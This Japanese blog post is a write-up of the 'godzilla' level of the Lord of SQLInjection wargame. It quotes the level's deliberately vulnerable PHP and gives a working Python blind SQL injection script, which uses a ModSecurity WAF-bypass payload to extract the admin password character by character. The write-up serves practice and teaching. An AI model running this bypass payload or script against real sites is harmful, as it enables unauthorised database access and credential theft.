はまやんはまやんはまやん

hamayanhamayan's blog

godzilla [LORD OF SQLINJECTION]

Lord of SQLInjection

<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_godzilla where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello admin</h2>";

$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_godzilla where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("godzilla");
highlight_file(__FILE__);

特徴は以下。

  • id,pwが入力可能
    • prob,_,.,()がフィルタリング
  • 問題文に書いてあるが、ModSecurityによるWAFが導入されている
  • adminのpwを抜き取る必要がある。

普通にBlind SQL Injectionできそうな感じがする。

Blind SQL Injection

今まで使ってきたWAF回避のコマンドを改造して、Blind SQL Injectionする。

import requests

url = "https://modsec.rubiya.kr/chall/godzilla_799df8.php"
cookie = {'PHPSESSID': 'eoddq5'}

def check(data) -> bool:
    return ("Hello admin" in data) or ("Hello guest" in data)

ok = 0
ng = 60

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = "-1'<@=1 OR {x (select 1)}='1' and id='admin' and " + str(md) + " <= length(pw) #"
    res = requests.get(url, params={'id': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 256

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = "-1'<@=1 OR {x (select 1)}='1' and id='admin' and " + str(md) + " <= ascii(substr(pw," + str(i+1) + ",1)) #"
        res = requests.get(url, params={'id': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")